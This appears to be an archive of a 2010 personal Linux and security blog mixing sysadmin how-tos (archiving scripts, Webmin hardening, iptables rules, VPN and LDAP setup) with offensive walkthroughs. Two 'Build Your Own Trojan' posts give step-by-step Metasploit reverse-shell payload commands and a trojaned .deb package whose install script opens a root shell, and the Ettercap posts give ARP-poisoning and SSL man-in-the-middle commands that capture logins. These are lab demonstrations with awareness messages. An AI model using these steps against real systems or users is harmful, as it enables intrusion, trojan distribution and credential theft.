.InsecureSystem.

Archiving Surveillance Video

2010-03-13T10:00:00.000-08:00

Script Time!
Bash to archive some files, and perl to send email alerts.

Even with my video captures only being triggered by motion... all the cars passing by, windy days, or cats that wander aimlessly around outside lead to images and .swf files to start building up fast. In the last week I had over 40000 .jpg files.. so along with turning down the sensitivity of the motion capture a bit, and moving a hanging plant out of the camera's view, I went ahead and made an archive script.

#!/bin/bash
#when archiving, toss the still images, keep the .swf videos.
#This uses a for loop to do it because motion can actually create
#more files than the rm command can handle by it's self.

for i in $(ls /motion/ |grep .jpg); do rm /motion/$i; done

#make a temp archive folder and drop the videos in it
mkdir /tmp/archv
mv /motion/*.swf /tmp/archv/.

#anything you use more than once should be a variable
timestamp=$(date |awk '{print $2$3"-"$6}')

#build all the videos into a timestamped tarball for storage
tar czvf archive-$timestamp.tar.gz /tmp/archv

#check to make sure the new archive was made
#if it wasnt, leave the tmp file alone and send an email alert
if [ -f archive-$timestamp.tar.gz ]
then
  rm -r /tmp/archv
else
  perl /root/mail.pl
fi

#while we're here, just check on the disk usage
#and send an email alert if its over 50%
if [ $(df -h |grep /dev/sda1|awk '{print $5}'|cut -d% -f1) -ge 50 ]
then
  /root/useagealert.pl
fi

The two perl scripts that are called are simple mailers, great little templates for interacting with sendmail. Here is an example of one:

#!/usr/bin/perl

$title='archive';
$to='me@myaddress.com';
$from= 'archive@myserver.org';
$subject='Archive Failed';

open(MAIL, "|/usr/sbin/sendmail -t");

## Mail Header
print MAIL "To: $to\n";
print MAIL "From: $from\n";
print MAIL "Subject: $subject\n\n";
## Mail Body
print MAIL "Archive process failed, please check the logs\n";

close(MAIL);

The archive script should then be added to the crontab, mine is set to archive twice a week for now, which will usually give me time to save images if I need to.

Linux: The Code, Parts 1 and 2

2010-03-12T18:09:00.000-08:00

First two parts of "The Code", 2006 documentary on open source software and its use around the globe.

Hooray for more publicly available documentaries.

Networking Cheatsheets

2010-03-12T16:48:00.000-08:00

Both for people trying to learn about these subjects for the first time, as well as for those of us that just like to have a quick reference handy, cheat-sheets will always have a place in information technology.

Thank you @packet_storm, these are awesome.

IPv4 Cheatsheet http://packetstormsecurity.org/filedesc/IPv4_Subnetting.pdf.html
Network Address Translation (NAT) Cheatsheet http://packetstormsecurity.org/filedesc/NAT.pdf.html
Virtual Lan (VLAN) Cheatsheet http://packetstormsecurity.org/filedesc/VLANs.pdf.html
Wireshark Display Filters Cheatsheet http://packetstormsecurity.org/filedesc/Wireshark_Display_Filters.pdf.html
Common Ports Cheatsheet http://packetstormsecurity.org/filedesc/common-ports.pdf.html
tcpdump Cheatsheet http://packetstormsecurity.org/filedesc/tcpdump.pdf.html
Cisco IOS IPv4 Access Lists Cheatsheet http://packetstormsecurity.org/filedesc/IOS_IPv4_Access_Lists.pdf.html

These are all from .:[ Packet Storm ]:. , one of my favorite sites.

Securing Webmin

2010-03-10T18:07:00.000-08:00

If you are a fledgling sysadmin, feeling lazy, or just plain want a gui and find yourself installing webmin on your server, please take a few minutes to secure it. I have a few simple examples of how this can be done. A lot of this also applies to other systems, so its good information to know even if you plan on never running webmin.

Universal Step 1, Change the default port:

Webmin listens on port 10000 by default and it is well known, this is a port that scripts and attackers actively look for. So to start, just change the port and reload webmin. I'll use 54444, use a different one in your own setup.

#vim /etc/webmin/miniserv.conf

...

port=54444

listen=54444

...

#/etc/init.d/webmin restart

It would also be a good idea to at this point, if you hadn't already, add port 10000 to your portsentry rules. (http://www.insecuresystem.org/2010/01/iptables-blacklist.html)

Option, Limit Access with Iptables:

Only allow certain IP address or networks to reach the webmin port, drop all other attempts. I recommend establishing a chain similar to the example below.

#iptables -N WEBMIN

#iptables -I INPUT 1 -p tcp --dport 54444 -j WEBMIN

#iptables -I INPUT 2 -p udp --dport 54444 -j WEBMIN

#iptables -A WEBMIN -s 192.168.168.0/24 -j ALLOW

#iptables -A WEBMIN -j DROP

Option, limit it to localhost and access webmin via port-forwarding:

Edit the miniserv.conf file, then restart webmin

#vim /etc/webmin/miniserv.conf

allow=127.0.0.1

Then from any other machine establish an ssh tunnel which forwards the webmin port

#ssh -L 54444:localhost:54444 user@myserver.org

And point your browser at https://localhost:54444

Option, Hide it inside a VPN:

If you establish a simple VPN then you can use either Iptables or the miniserv allow option as above to limit webmin to only allow access to the private vpn subnet.

Finally:

Webmin has had exploits against in the past; if you use it, make sure you keep it up to date.

.....

ps:

#/etc/init.d/webmin stop

#emerge --unmerge webmin

Ettercap Plugins

2010-03-10T16:54:00.000-08:00

Awesome high quality video from backtrack.it on using some of ettercap's plug-ins to both mess with network traffic, as well as detect if anyone else is trying to. I'll probably be exploring some of these myself soon.

Watch it full screen... with some good speakers for the music.

A Little Hacker History

2010-03-07T17:47:00.000-08:00

As long as this video stays up on Google, hopefully anyone interested can take the time to watch it. This is the history of Kevin Mitnick, of how the media metaphorically crucified him, and a view of the developing environment of the digital age.

Street Art

2010-03-07T08:53:00.000-08:00

Normally I'm opposed to graffiti, but this is just too awesome..

I wouldn't mind seeing tux and other Linux related art show up around town instead of gang tagging, particularly if the work actually looks good. I have no idea if the above image is real or if it's been shopped at all, I just love the concept, and if it is real Id love for their to be more.

Don't Talk to the Police

2010-03-07T06:43:00.000-08:00

It's apparently a video day, so here's a couple more. These two are both very entertaining.. and may be handy information for people to have, particularly those of us that tend to mess with technology in unusual ways.

Quick VPN

2010-03-05T15:35:00.000-08:00

Here is a fast and simple Open VPN configuration, it has no special features and uses a shared key for access, but you can have a VPN server running in about a minute.

On the server:

root@bt:/# cd /etc/openvpn

root@bt:/etc/openvpn# openvpn --genkey --secret quick.key

root@bt:/etc/openvpn# vim quickvpn.conf

dev tun
ifconfig 10.0.0.1 10.0.0.2
secret quick.key

root@bt:/etc/openvpn# scp quick.key root@client.tld:.

root@bt:/etc/openvpn# /etc/init.d/openvpn start

On the client:

root@zombi:/# cp quick.key /etc/openvpn/.

root@zombi:/# cd /etc/openvpn

root@zombi:/etc/openvpn# vim quickvpnclient.conf

remote vpnserver.tld
dev tun
ifconfig 10.0.0.2 10.0.0.1
secret quick.key

root@zombi:/etc/openvpn# /etc/init.d/openvpn start

root@zombi:/etc/openvpn# ping 10.0.0.1
PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=64 time=1.08 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=64 time=1.27 ms
^C

If you actually want to build a more permanent and secure vpn system, the Gentoo wiki has a great guide for that: http://en.gentoo-wiki.com/wiki/OpenVPN

Linux Wireless Bridge

2010-03-05T13:37:00.000-08:00

This keeps coming in handy every so often, it's a simple script to turn a Linux laptop into a wireless-to-Ethernet bridge. Today I ended up using it to get networking to a machine in an environment where there were no available ports on the switch to plug into; previously it's been used to provide access to a LAN which had no access to the WAN on its own, but there was a local wireless network which did.

Run this after establishing a wireless connection and connecting to another machine or switch, it will setup the private Ethernet network, iptables rules, forwarding, and the dhcp server.

#!/bin/bash
echo "router build for public interface ath0, private interface eth0"
echo "--------------------------------------------------------------"
echo "setting up the wire"
ifconfig eth0 192.168.0.1 netmask 255.255.255.0
echo "building nat for 192.168.0.X network"

iptables -t nat -A POSTROUTING -s 192.168.0.0/24 -o ath0 -j MASQUERADE

echo "setting routes between ethernet and wireless"
iptables -A FORWARD -s 192.168.0.0/24 -o ath0 -j ACCEPT
iptables -A FORWARD -d 192.168.0.0/24 -m state --state ESTABLISHED,RELATED -i ath0 -j ACCEPT

echo "saving"
sh -c "iptables-save > /etc/iptables.rules"

echo 1 > /proc/sys/net/ipv4/ip_forward

echo "success!"
echo "---------------------------------------"
echo "setting up dhcp for eth0"

echo "option domain-name-servers 4.2.2.2;" > /etc/dhcpd.conf

echo "default-lease-time 60;" >> /etc/dhcpd.conf
echo "max-lease-time 72;" >> /etc/dhcpd.conf

echo "ddns-update-style none;" >> /etc/dhcpd.conf
echo "authoritative;" >> /etc/dhcpd.conf
echo "log-facility local7;" >> /etc/dhcpd.conf

echo "subnet 192.168.0.0 netmask 255.255.255.0 {" >> /etc/dhcpd.conf
echo " range 192.168.0.100 192.168.0.254;" >> /etc/dhcpd.conf
echo " option routers 192.168.0.1;" >> /etc/dhcpd.conf
echo " option domain-name-servers 4.2.2.2;" >> /etc/dhcpd.conf
echo "}" >> /etc/dhcpd.conf

dhcpd

echo "dhcpd server running for eth0 network"

So far this has been tested to work on both Ubuntu and Gentoo.

Build Your Own Trojan, Pt. 2

2010-03-02T11:56:00.000-08:00

Not wanting to leave out the Linux side of things, here's a quick rundown of building a Trojan .deb file for owning Ubuntu/Debian users out there. Again, this is an attack that exploits users more than it does any specific system vulnerability, and unfortunately many Linux users.. particularly Ubuntu users (because a large percentage of them are new to computers / Linux / security).. will tend to be very trusting of others that offer them software or provide links to resources, and an unscrupulous attacker can take advantage of that.

All an attacker needs is a .deb, we'll use blast.. its a weird little game where you can turn your display into swiss cheese.

root@zombi:/#apt-get install blast

Then make a directory to work in and move the blast package there:

root@zombi:/#mkdir /x

root@zombi:/x# cp /var/cache/apt/archives/blast_1.1-19_amd64.deb .

root@zombi:/x# dpkg -x blast_1.1-19_amd64.deb pkg

root@zombi:/x# mkdir pkg/DEBIAN

Next, make a control file that details your new package, this can be as fake or realistic as you like but you must make sure the architecture is set to what your victim will be using (x86 vs amd64), and a post-install script that will run the Trojan binary:

root@zombi:/x# cd pkg/DEBIAN/

root@zombi:/x/pkg/DEBIAN# vim control

Package: Blast
Version: 0.666
Section: Games And Amusement
Priority: Optional
Architecture: i386
Maintainer: Deceased
Description: Tojan Test

root@zombi:/x/pkg/DEBIAN# vim postinst

#!/bin/sh

sudo chmod 2755 /usr/games/blast && /usr/games/blast & /usr/games/blast &

root@zombi:/x/pkg/DEBIAN# chmod 755 postinst

Next, set up the payload, this is done just like the windows Trojan only using a Linux shell and a normal binary rather than a .exe, after-which we build the new Trojan .deb package:

root@zombi:/x/pkg/DEBIAN# msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.168.13 LPORT=9999 X > /x/pkg/usr/games/blast

root@zombi:/x/pkg/DEBIAN# dpkg-deb --build /x/pkg

root@zombi:/x# mv pkg.deb blast_0.666.deb

And back to our trusty listener on the attackers machine, again, just like before when exploiting windows:

root@zombi:~# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.168.13 LPORT=9999 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.168.13:9999
[*] Starting the payload handler...

Now, the attacker is all set with their Trojan .deb package and only needs to trick a user into running it, the beauty in this particular vector is that in Debian based Linux systems a user must install packages as root or using sudo (ironically a security feature), which means that our Trojan will be executed as root.

---Through social engineering or some other method, the user is convinced to run our infected .deb ---

neurophobic@bt:~$ sudo dpkg -i blast_0.666.deb
tar: ./control: time stamp 2010-03-02 11:19:22 is 34.574471421 s in the future
tar: .: time stamp 2010-03-02 11:19:22 is 34.573961287 s in the future
Selecting previously deselected package blast.
(Reading database ... 269350 files and directories currently installed.)
Unpacking blast (from blast_0.666.deb) ...
Setting up blast (0.666) ...

Processing triggers for menu ...
Processing triggers for man-db ...

And the attacker is greeted with a nice little message:
[*] Sending stage (36 bytes)
[*] Sending stage (36 bytes)
[*] Command shell session 2 opened (192.168.168.13:9999 -> 192.168.168.144:52402)

hostname
bt
whoami
root

Todays lesson: stick to software in a trusted repository unless you really trust your source.

Smoked Glass Rom 5.0.1 ... and CM?

2010-03-01T19:14:00.000-08:00

I missed this update, its downloading now. Adamz finally has the smoked glass rom in a format that works with the standard flashing system... and its now version 5, dude works fast. This is a huge update and i'm looking forward to messing with it.

http://alldroid.org/viewtopic.php?f=311&t=2853

February 27, 2010 (5.0 & 5.0.1)
5.0.1
- Just a really quick update. I added the Beta 3 version of 2.1 Launcher (Greek35T). Even less issues!
5.0
*** Largest update is the ROM format... you get complete customization. Make the ROM your own!
- Options to Wipe Data and Wipe Data & keep Apps
- Options to Wipe Cache
- Option to copy HTC IME Keyboard to SD Card (thanks to jonasl at XDA)
- New version of 2.1 Launcher - Fixes Landscape and less FCing (thanks to Greek35T)
- Fixed issue of speed and FCing of 2.0.1 Launcher... sorry about that.
- Live Wallpapers (Interactive with Launcher2) (thanks to xeudoxus)
- 2.0 Lockscreen Vibrate Hack (Lockscreen will take you to vibrate... Long-press of power will silence)
- Two options for boot.img... 250-1100 MHz and 250-800 MHz.
- Option to choose which ROM from installation - Full Theme, Full with Blue Clock/Notifications, and Glass Only Theme
- Brought back the option to include Milestone MediaGallery and PhotoEditor
- Option to install Wifi Tether from the ROM Installation... no extra download necessary. (same version as before)
- Option to install the Audio Toggle App
- Option to install the Low Brightness App
- Option to install Droid Font

...

Also, check this out.. renowned rom maker Cyanogen has a 2.1 rom working on the Droid.

http://alldroid.org/viewtopic.php?f=328&t=2260

Anyone have info on it? im sure I will try it out before long

SSL Man In The Middle with Ettercap

2010-03-01T12:37:00.000-08:00

Playing a bit more with ettercap, this time around we'll look at enabling SSL Man in the Middle attacks so that we can retrieve data from encrypted connections as well as clear-text ones.

Edit /etc/etter.conf and set both the user and group id to 0, this is dangerous if someone has a method for counter attacking against ettercap, but it lets ettercap set iptables rules in order to forward ports for breaking SSL connections and substituting certificates. Those iptables rules are allready in etter.conf, and just need to be uncommented:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

You may also need to enable network forwarding:

#echo 1 > /proc/sys/net/ipv4/ip_forward

To get away from the noisy method used previously it's best to just pick on one host at a time, a quiet nmap of the network should give you an idea of which ip addresses on the network will make a good target, windows desktops are the best option obviously.

All you need to do is fire up ettercap like before but use an extra remote tag and plug in your victim ip address, I chose .24, a windows 7 machine.

#ettercap -Tqi wlan0 -M arp:remote /192.168.168.168/ /192.168.168.24/

This is where the attacker now depends on user ignorance and/or impatience, as when the victim tries to visit a site that uses SSL to encrypt the connection they will receive a giant warning screen telling them that somthing is wrong... which most users promptly ignore...

By accepting the invalid certificate which ettercap has provided them, the attackers machine now sees in cleartext all of the data that should have been encrypted. Furthermore, when ettercap sniffs a login packet, it immediately displays the contents of it to the attacker in a nice easy to read format such as this:

HTTP : 65.54.165.179:443 -> USER: [removed]@hotmail.com PASS: [removed] INFO: login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1267474281&rver=6.0.5285.0&wp=MBI&wreply=http://mail.live.com/default.aspx&lc=1033&id=6485

Ofcourse i removed the username and password since I don't want to show the world, but you can try this with your own account and see them clear as day.

This attack can be particularly devastating if crafted to target services that use expired, self signed, or otherwise problematic certificates which have made all of their users used to simply ignoring the warning given to them by their browser, the one chance users have to stop and think twice is destroyed.

Basic Arp Poisoning with Ettercap

2010-02-28T21:15:00.000-08:00

A simple one-liner in ettercap allows for the poisoning of a network to vastly improve the results gained in packet captures. This is a "noisy" method which will generate a large amount of traffic on a network and will be easily detected in any reasonably sophisticated infrastructure or by anyone running an IDS, however in small scale networks (a small business, coffee shop, public hotspot, etc.) it is unlikely to be noticed in the short run.

The quick and dirty:

root@zombi:~# ettercap -i wlan0 -T -q -M ARP /192.168.168.168/ //

This tells ettercap to use wireless inteface 0, go into Text mode, use quiet output, and start ARP poisoning the local gateway (in this instance, 192.168.168.168).

What ettercap will then do is start sending ARP reply packets to every other host on the network advertising the attackers machine as the correct route to send any packets destined for 192.168.168.168... that address being the gateway, this causes all traffic on the network that is outbound to the net to be sent through the attackers machine first where they can sniff or manipulate it at will.

As you can see, by firing up wireshark and telling it to filter for 'http' we can see the web traffic of other machines on the network, this packet being a simple weather update request from a smartphone on the network .. but you get the idea, it will show the attacker anything thats in clear text.

Active Apache Defense

2010-02-26T20:29:00.000-08:00

Running a web-server that is publicly accessible will quickly get one familiar with the onslaught of attempts to find vulnerable web applications on that site. Whether they are individual attackers, scripted scans, or just someone poking around, it's traffic you dont need and a source that you want nothing to with.. or rather, you want them to have nothing to do with your system.

This method, which was created with some collaboration with a peer of mine at school (who solved a huge security hole in it.. that whole escaping shell commands thing, pretty important), uses the apache mod_rewrite engine and a php/shell script combo to dynamically add iptables rules when specified urls are loaded against your server, the vast majority of the time a potential attacker will be banned before they even realize what happened.

First, create the php script, this one is about three revisions of tweaking and seems to work quite effectively...

testBan.php:

$banme=$_SERVER['REMOTE_ADDR'];
$myFile="ban.txt";
$fh = fopen($myFile, 'a') or die("Can't Open File");
fwrite($fh, $banme);
fwrite($fh, "\n");
fclose($fh);
$e = escapeshellcmd($banme);
system("/var/www/localhost/htdocs/sec/ignore.sh $e");
echo "
Security Violation: The IP Address $banme has been logged and added to the blacklist";

The echo is really for debugging purposes, there is no real need to let someone know that they've been banned.

ignore.sh:

#!/bin/bash

for i in $(cat ignorefile); do
   if [ $1 == $i ]
   then exit
   fi
done

sudo iptables -A INPUT -s $1 -j APACHE
echo $1 >> ignorefile

That iptables rule sends the traffic to a chain called APACHE, I like to direct it there for logging purposes, you could just as easily drop or reject the traffic outright.
Next, create or add to a .htaccess file in your web root directory and create rewrite rules based on the kind of access attempts you notice to be common. Collecting a group of these common attempts is pretty easy, just grep your apache error log for " 404 " and you will see large groups of attempts to find things like roundcube or phpmyadmin.

a basic mod_rewrite setup for looks like this:

RewriteEngine On

RewriteRule ^phpmyadmin/ /sec/testBan.php [R=301,L]

RewriteRule ^roundcube/ /sec/testBan.php [R=301,L]

RewriteRule ^XMBforum/ /sec/testBan.php [R=301,L]

RewriteRule ^webmail/ /sec/testBan.php [R=301,L]

There are plenty of more complex regex based rewrites you could use to trap even more attempts, these are just a simple example. Make sure none of your rewrites match a legitimate site URL or you'll end up blocking welcome traffic accidentally.

Simple Full Disk Encryption

2010-02-26T18:53:00.000-08:00

If you are installing ubuntu, you can setup an encrypted LVM as your root partition almost effortlessly. You just need to download the alternate disk rather than the normal live disk.

http://ftp.ucsb.edu/pub/mirrors/linux/ubuntu/9.10/ubuntu-9.10-alternate-amd64.iso.torrent

This disk will go into the old TUI style installer interface rather than booting a live Ubuntu session, however during the partitioning stage of the install there is an option available for a guided install using an encrypted LVM setup. After select and confirming that option, it will then prompt for a password... make it a good one, and one that you'll remember.

Using this method it is virtually impossible to boot into the operating system or read anything on the disk without knowing the password that you set, and attempting to crack the encryption would be a monumental and expensive effort.

Passwords Across Services

2010-02-24T18:46:00.000-08:00

When I first got a gmail account I didnt take it too seriously, another random email, and so I set it up with a password that I commonly used as a "throwaway".. it was relatively weak and used on a few other sites, including ones that don't even bother with encryption; but again, why did I care? its some junk email site...

Then I started using google docs, then google analytics, google checkout, google adsense, blogger, and so on... the throwaway little junk email was suddenly responsible for a large portion of my online presense and tied to at least one credit card, and the other day I was logging into gmail and realised what i was typing... a weak password, used on multiple sites, with high exposure.

Needless to say, I went and changed it to somthing much stronger. In fact I took the opportunity to change most of my passwords to stronger alternatives, making sure to separate the secure and insecure sites, and I encourage everyone else to as well.

Take a moment and think about how many sites you use the same password for, google especially, and if any of those sites have a login in cleartext.

It's amazing how these things can just sneak up on people.

P.S. for the unaware, a strong password is longer than 8 characters and composed of letters, numbers, and symbols, or a sentence/phrase that's longer than 16 characters.

Sun LDAP Proxy

2010-02-24T15:04:00.000-08:00

Since one of the ldap proxy systems i work with with decided to start having issues last week, today i took the time to go in and rebuild it... a pretty simple task in general, but again, nothing produced by sun has straightforward instructions.. at least not until someone that acctually uses their software writes them.

So with a little help from google, and a lot of references to help files, here is how to set up a Sun Directory Server Enterprise Edition proxy server that points to three back-end servers.

Jump into the DSEE dps6 toolbox, then create and start your proxy instance:

#cd /opt/SUNWdsee/dps6/bin
#./dpadm create /var/opt/SUNWdsee/ldap_proxy1
#./dpadm start /var/opt/SUNWdsee/ldap_proxy1/

Next we'll configure the instance with dpconf. If you get stuck, or need to know what else dpconf can do, the --help flag does at least provide a list of arguments:

#./dpconf --help

1. Create an ldap data source pool, you can then view it to make sure it was created.
#./dpconf create-ldap-data-source-pool ldap_pool
#./dpconf list-ldap-data-source-pools

2. Create your ldap data sources, you can name them whatever you want, I just used their hostnames, make sure the address of each is correct though.

#./dpconf create-ldap-data-source ldapserver1 ldapserver1.mydomain.org:389
#./dpconf create-ldap-data-source ldapserver1 ldapserver2.mydomain.org:389
#./dpconf create-ldap-data-source ldapserver3 ldapserver3.mydomain.org:389

3. Attach your data sources to the data pool, this can be done all in one command.
#./dpconf attach-ldap-data-source ldap_pool ldapserver1 ldapserver2 ldapserver3

4. Set the bind preference weights for each data store, you can set all the weights equally, or you can set some with higher weights than others to indicate preferred connections. Below we set ldap1 and ldap2 at a higher weight than ldap3, so ldap3 is only likely to be used if both 1 and 2 are already overloaded.

#./dpconf set-attached-ldap-data-source-

prop ldap_pool ldapserver1 add-weight:10 bind-weight:10 compare-weight:10 delete-weight:10 modify-dn-weight:10 modify-weight:10 search-weight:10
#./dpconf set-attached-ldap-data-source-prop ldap_pool ldapserver2 add-weight:10 bind-weight:10 compare-weight:10 delete-weight:10 modify-dn-weight:10 modify-weight:10 search-weight:10
#./dpconf set-attached-ldap-data-source-prop ldap_pool ldapserver3 add-weight:5 bind-weight:5 compare-weight:5 delete-weight:5 modify-dn-weight:5 modify-weight:5 search-weight:5

5. Set the bind dn for each data source, this is usually "Directory Manager" if your back-end is the standard sun setup.
#./dpconf set-ldap-data-source-prop ldapserver1 bind-dn:"cn=Directory Manager"
#./dpconf set-ldap-data-source-prop ldapserver2 bind-dn:"cn=Directory Manager"
#./dpconf set-ldap-data-source-prop ldapserver3 bind-dn:"cn=Directory Manager"

6. Set-up the bind password. You can't insert it as an argument by its self, you have to create a file that has your password in it, and then pass the set command that file as it's argument.

#echo secretbindpassword > pass
#./dpconf set-ldap-data-source-prop ldapserver3 bind-pwd-file:pass
#./dpconf set-ldap-data-source-prop ldapserver2 bind-pwd-file:pass
#./dpconf set-ldap-data-source-prop ldapserver1 bind-pwd-file:pass

7. Finally, point your default proxy data view at your ldap data source pool, and then restart the proxy instance.

#./dpconf set-ldap-data-view-prop root\ data\ view ldap-data-source-pool:ldap_pool
#./dpadm stop /var/opt/SUNWdsee/ldap_proxy1/
#./dpadm start /var/opt/SUNWdsee/ldap_proxy1/

If all is well you should now be able to bind and query against the ldap proxy, which will load balance connections between the backend servers according to the weights you set.

Build Your Own Trojan, pt.1

2010-02-23T19:12:00.000-08:00

I somehow missed this magic of Metasploit but recently have scene some examples of it floating around the web. Metasploit allows you to simply encode a payload into a binary (.exe), so that it runs in the event that you can get a victim to execute that binary.

My first shot at this was sort of a "hello world" in my own network just to see it work, so I built a reverse connect binary called exploitme.exe using the following command:

root@oblivion:/pentest/framework3# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.168.13,LPORT=4444 R > exploitme.exe

That basically says "when someone runs exploitme.exe, connect back to 192.168.168.13 on port 4444 and serve up a shell as the user that executed the exploit". I put that .exe on a local web-server so I could grab it on a windows box later.

Then on the attacker machine (.13) the same code essentially used as a handler, which just sort of hangs out and waits for the exploited machine to call home:

root@oblivion:/pentest/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.168.13 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.168.13:4444

So this, all by its self was way too easy... I hop on a windows7 machine and download exploitme.exe (of-course, if this were really an attempt to attack someone, better names include: setup.exe, crack.exe, avg_free.exe, limewirepro.exe, etc...). Anyway, once the executable is downloaded, and the user tries to run it, nothing seems to happen on their end (no real program is there in this version, just the exploit) and the waiting handler on the attackers machine is greeted with this:

[*] Starting the payload handler...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.168.13:4444 -> 192.168.168.24:51166)

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Program Files\Mozilla Firefox>

...awesome.

In the future I'll have a look at anti-virus evasion and more entertaining payloads than just a simple shell.

Sun Webserver7 - SSL

2010-02-22T13:45:00.000-08:00

Dropping the following commands here so that I can reference them in the future, and since it was a pain in the ass to find the details in the first place maybe this will help someone else out too. As always with sun software, I'm amazed that somthing this simple is also so arcane.

Preparing a signed certificate:

bash# /usr/sfw/bin/openssl pkcs12 -export -out mycert.pk12 -in mycert.cer -inkey mycert.key -nodes -name "sslcert"

(where mycert.cer is the signed cert from your authority, and mycert.key is the private key you generated the original request with)

Adding the certificate to the local database:

bash# pk12util -i mycert.pk12 -d /var/opt/SUNWwbsrv7/https-my-domain.com/config/.

Setting up the https listener with that cert:

bash# /opt/SUNWwbsrv7/bin/wadm --user=admin --port=8800 --no-ssl

wadm> pull-config --config=my-domain.com my-domain.com

wadm> create-http-listener --listener-port=443 --default-virtual-server-name=my-domain.com --config=my-domain.com

wadm> set-ssel-prop --config=my-domain.com --http-listener-2 server-cert-nickname=sslcert enabled=true

wadm> deploy-config my-domain.com

victory

Handy Iptables Rules

2010-02-21T12:35:00.000-08:00

#allow all return traffic from outbound connections
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

#never block localhost
iptables -A INPUT -s 127.0.0.1/32 -j ACCEPT

#allow access to ssh from a specific network
iptables -A INPUT -s 192.168.100.0/24 -p tcp -m tcp --dport 22 -j ACCEPT

#block all other access to ssh
iptables -A INPUT -p tcp -m tcp --dport 22 -j REJECT

#quick rule to block a specific ip
iptables -A INPUT -s 192.168.0.13 -j DROP

#create a new iptables chain
iptables -N BLACKLIST

#set rules to log and then reject all traffic sent to a chain
iptables -A BLACKLIST -j LOG --log-prefix "[BLACKLISTED]: "

iptables -A BLACKLIST -j REJECT --reject-with icmp-host-prohibited

#send all traffic from a specific ip to a chain
iptables -A INPUT -s 192.168.0.99 -j BLACKLIST

#send all traffic to a specific port to a chain
iptables -A INPUT -p tcp -m tcp --dport 31337 -j BLACKLIST

#create a chain for ssh and send all new ssh sessions to it
iptables -N SSH_CHECK

iptables -A INPUT -p tcp -m tcp --dport 22 -m state --state NEW -j SSH_CHECK

#rate limit ssh to prevent brute force attempts (any more than 4 connections in 60 seconds will be dropped), and log any such events.
iptables -A SSH_CHECK -m recent --set --name SSH --rsource

iptables -A SSH_CHECK -m recent --update --seconds 60 --hitcount 4 --name SSH --rsource -j LOG --log-prefix "SSH Brute Force: "

iptables -A SSH_CHECK -m recent --update --seconds 60 --hitcount 4 --name SSH --rsource -j DROP

#Forward a port to another ip address using NAT
iptables -t nat -A PREROUTING -p tcp -m tcp --dport 9001 -j DNAT --to-destination 192.168.0.100

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Smoked Glass Rom

2010-02-20T09:08:00.000-08:00

New release of Adamz's smoked glass rom for the Motorola Droid came out yesterday, so ofcourse I immediately re-flashed my phone (there goes that Linux ocd again..). This thing is fast, pretty, and powerful, and if you run a rooted Droid or are willing to take that plunge then i wholly suggest this rom.

Smoked Glass v4.5

....
February 19, 2010
- Created custom kernel with 9 Processor Slots (More than enough to suit all needs)
- - 250, 400, 550, 600, 700, 800, 900, 1000, 1100 MHz Processor Slots
--- Processor Temperature Monitoring (Almost had it... but without sholes.info's repo I wouldn't have gotten what I was missing)
- - DMA Race Conditioning (thanks to sholes.info's great repo!)
--- Updates from 2.6.32 to fix Brightness and Touchscreen Issues (thanks to t3hSteve for posting the patch)
- - Nand Prefetch
- - Wi-Fi Tether
- Fixed Lockscreen Images in Landscape (I have NO idea how I did that...)
- Added xeudoxus' Launcher2.apk with fixed homescreen position.
- Removed Links for Extra Overclocking and Extra Overclocking Instructions
....

A note on rooting / flashing roms: everyone always gives the warning that it's potentially dangerous, it could brick your phone, things may not work right, etc. However i've yet to find anyone who, following proper backup/restore procedures, has had any problems that weren't immediately fixable.

That being said, I ofcourse am not liable for you messing up your phone just because I endorse this awesome software.

transfering files to android

2010-02-19T10:06:00.000-08:00

Yet another use for netcat...

Not having an ftp server handy and wanting to transfer a new ROM to my Droid, I tried to find the simplest method possible without the nuisance of plugging in the usb... maybe i'm just obsessed with netcat lately. This should work on any rooted android device with busybox installed.

server (192.168.168.13):

$cat new_rom.zip | nc -l -p 8080

droid (on the 192.168.168.0/24 wireless):

$$ su
#cd /sdcard
#busybox nc 192.168.168.13 8080 > new_rom.zip

Instant Messengers and Encryption

2010-02-18T19:35:00.000-08:00

Instant messaging services are remarkably still common for average net users to employ on a daily basis, however many (perhaps the majority) don't realize that on most networks every message they send is in clear-text and can be read by anyone else on their local network (like some creepy guy in Starbucks, or a hacker on your campus wireless).

Both AIM and GoogleTalk have an SSL option, why it's not enabled by default is something I don't quite grasp.. but you should be able to turn it on in your client. I happen to use pidgin, so for me the SSL options look like this.

As long as you have "use SSL" or "Require SSL" then your logins and communications should be safe from casual eavesdroppers.

As for msn/hotmail, their IM appears to send login credentials over a TLS encrypted connection.. so at least no one can sniff your username/password and get into your account, but after that it drops to a normal plain-text connection and all of your messages can be sniffed.

Facebook's new XMPP service is the worst of the lot, it expressly advertises that it doesnt in any way support encryption, advising users to uncheck the ssl option for XMPP. This makes using a facebook chat in a public location extremely vulnerable.

The only options for securing msn or facebook XMPP is to set up an encrypted socks5 tunnel and point those messenger accounts at it, this can be done using an SSH tunnel if you have a public facing unix system available to you (ssh -D1234 username@fqdn).

cryptcat

2010-02-18T16:51:00.000-08:00

Just noticed this in backtrack4, cryptcat is just like netcat only creates encrypted connections instead. The only downside is that you need cryptcat on both ends of the connection.

Make sure to use the -k flag to change the encryption key, otherwise it reverts to a hardcoded known key.. which kinda defeats the point.

server (1.2.3.4):

cryptcat -k mykey -l -p 4444

client:

cryptcat -k mykey 1.2.3.4 4444

win!